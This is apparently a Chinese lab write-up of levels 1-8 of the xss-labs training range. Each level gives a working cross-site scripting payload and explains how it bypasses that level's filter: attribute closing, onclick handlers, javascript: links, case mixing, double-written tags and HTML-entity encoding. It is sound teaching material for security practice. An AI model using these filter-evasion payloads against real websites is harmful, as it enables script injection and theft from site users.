当前位置: 首页 > news >正文

xss-lab1-8关

news 2025/7/17 9:28:05

第一关

直接在url的name中注入

http://localhost/xss-labs/level1.php?name=<script>alert(1)</script>

第二关

在这里插入图片描述
查看网页代码,使用">闭合value标签

"><script>alert(1)</script>

第三关

先输入任意值,查看代码
在这里插入图片描述
这里显示value属性被过滤,可以构造事件来执行js
尝试发现单引号不会被转义

' onclick='alert(1)

第四关

同三,但此处使用双引号闭合

" onclick="alert(1)

第五关

简单注入js,发现script中加入了下划线
在这里插入图片描述
使用伪协议并闭合input

"><a href=javascript:alert(1)>

第六关

注入后发现href被过滤
在这里插入图片描述
尝试大小写后成功绕过

"><a HRef=javascript:alert(1)>

第七关

直接注入后发现被替换为空
在这里插入图片描述
通过双写绕过

"><scrscriptipt>alert(1)</scrscriptipt>

第八关

直接注入发现js被过滤
在这里插入图片描述
使用unicode绕过

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
http://www.dtcms.com/a/282982.html

相关文章:

  • AdsPower 功能详解 | 应用中心使用指南:插件统一管理更高效、更安全!
  • [NOIP][C++] 树的重心
  • 精彩代码分析-1
  • 深入探讨机器学习中的过拟合:从VC维到正则化的贝叶斯视角
  • Alamofire 网络请求全流解析,通俗易懂
  • 降本增效利器:汽车制造中EtherCAT转PROFIBUS DP网关应用探析
  • Linux权限管理:玩转root与用户组
  • 前端 oidc-client 静默刷新一直提示:Error: Frame window timed out 问题分析与解决方案
  • 前端上传 各类 文件 ,前端自己解析出来 生成界面 然后支持编辑(增强版 支持大多数文件格式的在线编辑)
  • React Native 在 Web 前端跨平台开发中的优势与实践
  • Windows下编译pthreads
  • vue-router 导航式编程 参数的设置
  • 优学教育官网搭建02课程中心
  • vscode Cline接入火山引擎的Deepseek R1
  • 项目资源预算分散,如何实现协同整合?
  • orfeotoolbox ResetMargin
  • 《小白学习产品经理》第五章:方法论之波士顿矩阵
  • Linux中的GDB的作用与GCC的区别
  • 设计一款用于捕捉动态产品视频的摄像机器人
  • 《透视定轴:CSS 3D魔方中视觉层级的秩序法则》
  • Linux下操作SQL SERVER
  • sqli-labs通关笔记-第03关 GET字符型注入(单引号括号闭合 手工注入+脚本注入两种方法)
  • github上传大文件
  • 2025 Python3 网络编程 Socket编程详解
  • 基于SD-WAN的智慧高速解决方案:高效、低成本的智能交通实践
  • AWS权限异常实时告警系统完整实现指南
  • 网络安全初级(XSS-labs 1-8)
  • WebView 性能调试与优化 解决资源加载与请求顺序问题
  • 5.更新-demo
  • Matlab数字图像处理——基于图像分割与模板匹配的的车牌识别系统